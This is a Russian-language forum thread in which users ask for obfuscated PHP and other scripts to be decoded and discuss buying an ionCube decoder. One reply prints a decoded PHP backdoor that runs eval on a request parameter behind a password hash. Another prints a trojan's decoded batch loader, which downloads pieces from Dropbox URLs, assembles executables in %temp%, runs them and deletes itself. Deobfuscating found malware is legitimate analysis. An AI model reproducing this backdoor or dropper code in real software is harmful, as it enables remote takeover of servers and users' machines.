Обфускация кода (вопросы, просьбы зашифровать/расшифровать скрипт )

Discussion in 'PHP' started by Sharky, 29 Sep 2009.

  1. Kaimi

    Kaimi Well-Known Member

    Joined:
    23 Aug 2007
    Messages:
    1,732
    Likes Received:
    811
    Reputations:
    231
    sendspace.com/file/zlmu5n
     
    _________________________
  2. Тёмка)

    Тёмка) New Member

    Joined:
    9 Aug 2013
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Помощь со скриптами

    Здравствуйте! Пожалуйста, если Вам не сложно, помогите деобфусцировать несколько скриптов.
    Вот - http://rusfolder.com/37580307
    Я буду очень признателен, если Вы поможете!
     
  3. shadow6630

    shadow6630 New Member

    Joined:
    5 Jul 2012
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    В общем предлагают мне купить декодер ионкуба 8.

    Дал на проверку файлик закодированный, раскодировали не некоторые переменные остались не вскрыты. Нужно ручками добивать, как я понял там Base64. Можна ли как-то автоматизировать процес деобфускации , написать скриптик ?

    Файл до и после снятия защиты прикрепил. Еще вопрос: это декодер ионкуба плохо вскрыл или там было дополнительное шифрование помимо ионкуба ? Стоит ли покупать такой декодер ? Еще заметил в файле переменные вида $eaahgfejee, как их вскрыть ?
    Под ионкубом -http://rghost.ru/48247535
    Вскрытый - http://rghost.ru/48247557
     
  4. cvieri

    cvieri New Member

    Joined:
    27 Aug 2011
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Интересует раскодирование нескольких файлов закодированых bcompiler. Про оплату и другие вопросы - в личке.
     
  5. -WarMan-

    -WarMan- New Member

    Joined:
    8 Apr 2009
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    парни, зенд кто нидь может расшифровать?
     
  6. timka23

    timka23 New Member

    Joined:
    3 Jun 2013
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Спс!
     
    #786 timka23, 13 Sep 2013
    Last edited: 13 Sep 2013
  7. Kaimi

    Kaimi Well-Known Member

    Joined:
    23 Aug 2007
    Messages:
    1,732
    Likes Received:
    811
    Reputations:
    231
    Так расшифруй сам, например, тут: http://jsunpack.jeek.org/
    Или сам напиши в начале кода что-нибудь вроде
    Code:
    zzz = eval; eval = function(zz) { document.write("<textarea>" + zz + "</textarea>"); return zzz(zz); };
    
    и открой страницу в браузере
     
    _________________________
  8. Natali72

    Natali72 New Member

    Joined:
    21 Sep 2013
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Помогите раскодировать файлик буду очень признательна

    http://pastebin.com/F9tDCn89
     
  9. Kaimi

    Kaimi Well-Known Member

    Joined:
    23 Aug 2007
    Messages:
    1,732
    Likes Received:
    811
    Reputations:
    231
    http://pastebin.com/9SnY0kJy
     
    _________________________
  10. Natali72

    Natali72 New Member

    Joined:
    21 Sep 2013
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Большое спасибочки извените за мою наглость помогите еще с одним файликом.
    http://pastebin.com/HnSTai1S
     
  11. Kaimi

    Kaimi Well-Known Member

    Joined:
    23 Aug 2007
    Messages:
    1,732
    Likes Received:
    811
    Reputations:
    231
    http://pastebin.com/ij2rUrQD

    Всё элементарно можно сделать самостоятельно с помощью PHP Generic Eval Unpacker из первого поста.
     
    _________________________
  12. kritoto

    kritoto New Member

    Joined:
    10 Apr 2012
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    http://pastebin.com/DGJSMzWJ
    Помогите расшифровать или объясните плз.
     
  13. Kaimi

    Kaimi Well-Known Member

    Joined:
    23 Aug 2007
    Messages:
    1,732
    Likes Received:
    811
    Reputations:
    231
    http://pastebin.com/7KKZd1EA

    берешь софт из первого поста и расшифровываешь...
     
    _________________________
    1 person likes this.
  14. -WarMan-

    -WarMan- New Member

    Joined:
    8 Apr 2009
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    парни, помогите
    http://pastebin.com/79MKS8r3
     
  15. seosimf

    seosimf Member

    Joined:
    3 Mar 2011
    Messages:
    271
    Likes Received:
    44
    Reputations:
    6
    PHP:
    eval("if(isset(\$_REQUEST['ch']) && (md5(\$_REQUEST['ch']) == '7e0b6386436f8da3bbcf9677a4626456') && isset(\$_REQUEST['php_code'])) { eval(\$_REQUEST['php_code']); exit(); }")
     
  16. nervdd1

    nervdd1 New Member

    Joined:
    2 Sep 2013
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    словил трояна
    помогите разшифровать загрузчик
    http://www.sendspace.com/file/o025k5
     
  17. Kaimi

    Kaimi Well-Known Member

    Joined:
    23 Aug 2007
    Messages:
    1,732
    Likes Received:
    811
    Reputations:
    231
    Code:
    if exist g0t.exe (goto stp) else (goto strt)
    :strt
    copy /b "g3.jp" + "un3.jp" + "z3.jp" "fr0.jp"
    echo http://dl.dropboxusercontent.com/u/156444131/MX/th41l3/u.jp>>-c.jp
    copy /b "fr0.jp" "cycle.cmd"
    cy%QHY QGA%.cmd
    :stp
    exit
    
    Code:
    S%.jp" + "tape.jp" + "onth.jp" "gdiplus.dll"
    copy /b "gtix.jp" + "frwl.jp" + "mknp.jp" "dsfVorbisDecoder.dll"
    copy /b "tkth.jp" + "hewb.jp" "Hebrew.lg"
    copy /b "into.jp" + "nipto.jp" + "binm.jp" + "ver0.jp" "dr0.cmd"
    move /y "dr0.cmd" "%temp%\dr0.cmd"
    call "%temp%/dr0.cmd"
    :sir
    del /f /q *.jp
    del %0
    
    Code:
    pad.exe e %g0tt%
    notepad.exe e http://dl.dropboxusercontent.com/u/156444131/MX/unz/z1.jp
    notepad.exe e http://dl.dropboxusercontent.com/u/156444131/MX/unz/z2.jp
    notepad.exe e http://dl.dropboxusercontent.com/u/156444131/MX/unz/un.jp
    notepad.exe e http://dl.dropboxusercontent.com/u/156444131/MX/unz/un2.jp
    copy /b "z1.jp" + "z2.jp" "7z.dll"
    copy /b "un.jp" + "un2.jp" "4np.exe"
    4np.exe x -bd -y -o%temp% u.jp
    cd %temp%\jp
    copy /b "vinj.jp" + "init.jp" "vp8encoder.dll"
    copy /b "exua.jp" + "mrsh.jp" "RWLN.dll"
    copy /b "huts.jp" + "finl.jp" + "endx.jp" + "tlx4.jp" + "xcon.jp" "%JOKE%%COKE%.
    exe"
    copy /b "judg.jp" + "rpcs.jp" "RIPCServer.dll"
    copy /b "hexl.jp" + "misc.jp" "vp8decoder.dll"
    copy /b "link.jp" + "outm.jp" + "masm.jp" + "titk.jp" + "lilo.jp" + "hexn.jp" +
    "temp.jp" + "dild.jp" + "take.jp" "dsfVorbisEncoder.dll"
    copy /b "dynm.jp" + "m0.jp" + "exti.jp" "msvcr90.dll"
    copy /b "10v3.jp" + "halk.jp" "msvcp90.dll"
    copy /b "mvcm.jp" + "tmkx.jp" "Microsoft.VC90.CRT.manifest"
    copy /b "dymo.jp" + "hexp.jp" + "gixj.jp" "rfusclient.exe"
    copy /b "mikx.jp" + "m4i%QP
    
    И т.д.
     
    _________________________
  18. nervdd1

    nervdd1 New Member

    Joined:
    2 Sep 2013
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    какой прогой рассшифрововал ?
     
  19. Kaimi

    Kaimi Well-Known Member

    Joined:
    23 Aug 2007
    Messages:
    1,732
    Likes Received:
    811
    Reputations:
    231
    Руками
     
    _________________________
  20. grand-grand

    grand-grand New Member

    Joined:
    9 Oct 2013
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Добрый день,пожалуйста, помогите расшифровать.